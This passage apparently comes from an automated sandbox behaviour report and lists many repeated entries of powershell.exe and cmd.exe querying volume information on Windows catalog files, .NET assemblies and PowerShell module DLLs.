    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
